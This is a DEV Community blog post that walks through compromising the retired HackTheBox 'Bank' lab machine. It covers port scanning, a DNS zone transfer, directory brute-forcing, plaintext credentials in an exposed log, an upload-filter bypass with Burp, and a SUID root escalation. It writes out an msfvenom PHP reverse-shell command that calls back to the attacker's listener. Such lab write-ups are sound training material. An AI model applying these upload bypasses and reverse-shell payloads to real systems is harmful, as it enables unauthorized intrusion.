DEV Community

loading...

Writeup: HackTheBox Bank - NO Metasploit

artis3n profile image Ari Kalfus Originally published at blog.artis3nal.com on ・8 min read

This series will follow my exercises in HackTheBox. All published writeups are for retired HTB machines. Whether
or not I use Metasploit to pwn the server will be indicated in the title.

Bank

Difficulty: Easy

Machine IP: 10.10.10.29

I start off with my customary port scan. I've stopped using AutoRecon for a while now because I found much more value in running specific enumerations myself.

I identify the open ports and then interrogate them for additional information.

sudo nmap -sS -T4 -p- 10.10.10.29

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-06 15:18 EDT
Nmap scan report for 10.10.10.29
Host is up (0.013s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 24.39 seconds
Enter fullscreen mode Exit fullscreen mode
sudo nmap -sS -A -sC -sV -T4 -p 22,53,80 10.10.10.29
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-06 15:19 EDT
Nmap scan report for 10.10.10.29
Host is up (0.016s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel                                                          

TRACEROUTE (using port 80/tcp)                                                                                   
HOP RTT      ADDRESS                                                                                             
1   18.16 ms 10.10.14.1                                                                                          
2   18.27 ms 10.10.10.29 
Enter fullscreen mode Exit fullscreen mode

A nmap -sU scan shows that udp/53 is open as well.

An item of particular interest to me is that tcp/53 is open. DNS is primarily served over UDP. The tcp/53 port is often used for zone transfers. I will definitely want to try that. Additionally, the Apache web server on tcp/80 will definitely be a primary target during my enumeration.

Now ready to dig into these findings, I attempt a zone transfer. HTB machines usually have the domain name <box>.htb, so I guess that the server is bank.htb. It works! I discover some additional subdomains for this server.

dig axfr @10.10.10.29 bank.htb

; <<>> DiG 9.16.3-Debian <<>> axfr @10.10.10.29 bank.htb
; (1 server found)
;; global options: +cmd
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
bank.htb.               604800  IN      NS      ns.bank.htb.
bank.htb.               604800  IN      A       10.10.10.29
ns.bank.htb.            604800  IN      A       10.10.10.29
www.bank.htb.           604800  IN      CNAME   bank.htb.
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
;; Query time: 8 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Sat Jun 06 16:06:36 EDT 2020
;; XFR size: 6 records (messages 1, bytes 171)
Enter fullscreen mode Exit fullscreen mode

Reviewing my notes after the fact, I never actually tried modifying etc/hosts and reaching out to chris.bank.htb. So the zone transfer is likely a red herring. Everything we need is on bank.htb.

So, let's check out the web server. I start enumerating end points with Gobuster, one of my favorite tools. I don't find anything.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.10.29
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.29
[+] Threads:        10                                                                                            
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/big.txt                                             
[+] Status codes:   200,204,301,302,307,401,403                                                                   
[+] User Agent:     gobuster/3.0.1                                                                                
[+] Timeout:        10s                                                                                           
===============================================================                                                   
2020/06/06 15:26:56 Starting gobuster                                                                             
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/server-status (Status: 403)
===============================================================
2020/06/06 15:27:31 Finished
===============================================================
Enter fullscreen mode Exit fullscreen mode

Hmm... I think about the DNS server again. I modify my etc/resolv.conf file to set my nameserver as the Bank machine:

nameserver 10.10.10.29
Enter fullscreen mode Exit fullscreen mode

I now re-run Gobuster with the bank.htb domain instead of the direct IP. Now we're getting somewhere!

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://bank.htb

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://bank.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/06 15:39:26 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/assets (Status: 301)
/inc (Status: 301)
/server-status (Status: 403)
/uploads (Status: 301)
===============================================================
2020/06/06 15:40:03 Finished
===============================================================
Enter fullscreen mode Exit fullscreen mode

Navigating to /inc, I see a directory is exposed and, in particular, a user.php file.

/inc directory

I can't view the contents of the file because my browser will execute the PHP instead of displaying the source, but I take a note of it as I'll likely want to read it once I have a shell on the system.

I don't see anything else of interest so I try Gobuster again, with a larger wordlist.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bank.htb/ -t 30

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://bank.htb/
[+] Threads:        30
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/06 16:11:55 Starting gobuster
===============================================================
/uploads (Status: 301)
/assets (Status: 301)
/inc (Status: 301)
/server-status (Status: 403)
/balance-transfer (Status: 301)
===============================================================
2020/06/06 16:14:07 Finished
===============================================================
Enter fullscreen mode Exit fullscreen mode

Ah ha! A new endpoint, /balance-transfer. That should be promising. Indeed, navigating to the endpoint reveals a directory with a ton of files.

balance-transfer directory with many files

Looking into some of these files, they appear to be transaction logs of whatever bank this server is pretending to be. I see encrypted credentials in each file. Maybe one of the files has unencrypted credentials?

balance transfer file details

There are a ton of files in the directory, however, so looking at each one was not going to work out. I notice that all of the files appear to have a size of 584. Some have 583 or 582, but all are around that size. So, I want to see if there was a file that has a significant different size. I use ctrl+f in the browser and search for 58. The gives me a good visual indicator to scroll down the page and identify any file that is out of place. I find one!

balance transfer out of place file

This file is only 257 characters long. I navigate to the file and see that it logged a failed transaction. In this case, the encryption failed so it logged the user's credentials in plaintext.

balance transfer credentials in plaintext

There is a login page at bank.htb/login.php and I use these credentials to login.

logged in as chris

Time for more enumeration! I look at what an authenticated user can do. There is a support page at http://bank.htb/support.php and it looks like I can submit a support ticket with a file attachment. By hovering over the attachment link, I see in the bottom left that the attachment is available at http://bank.htb/uploads/.

test attachment

Ok! I want to upload a PHP web shell. I generate a payload with msfvenom:

msfvenom -p php/reverse_php LHOST=10.10.14.34 LPORT=443 > shell.php

[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 3005 bytes
Enter fullscreen mode Exit fullscreen mode

I try to upload shell.php directly, but get an error.

php upload error

Only images, huh?

doubt

I have been proxying my browser traffic through Burp Suite, so I copy my file upload request and start modifying it. I change the Content-Type from application/php to image/png and set a null terminator on the file name.

modifying php upload in burp

This works! But, the .php file does not execute from /uploads. I believe my null terminator broke it. However, inspecting the source of the web page in Burp I find something interesting...

webpage debug php

The debug comment says .htb files will execute as .php. I modify my request in Burp to use shell.htb instead of shell.php (and drop the null terminator) and I can upload it successfully!

shell uploaded

All right. Let's see if it worked. I start a netcat listener on my machine and navigate to my file in the uploads/ directory. It works and I get a shell as the www-data user!

netcat webshell

Time to gather information from the file system and escalate my privileges. I can read the user flag from /home/chris as the www-data user.

www-data@bank:~/bank/uploads$ cd /home/chris
cd /home/chris
www-data@bank:/home/chris$ ls -l
ls -l
total 4
-r--r--r-- 1 chris chris 33 May 29  2017 user.txt
Enter fullscreen mode Exit fullscreen mode

Now for the root shell.

Remembering the user.php file I saw on the /inc endpoint, I navigate to the web server directory and read the file. There is a mysql connection string using root credentials stored in the file. There's nothing I need in the database, though. I spent some time here in a rabiit hole.

Let's run LinEnum!

I copied the file it generated onto my local system to review it, so the colorized text flags are all over it. However, I notice in its list of SUID binaries that a particularly unusual one stands out.

suid binaries

var/htb/bin/emergency... Interesting. I run it. It elevates me to a root shell. Neat. I go ahead and read the root flag in /root/root.txt.

emergency suid

Discussion (0)

pic
Editor guide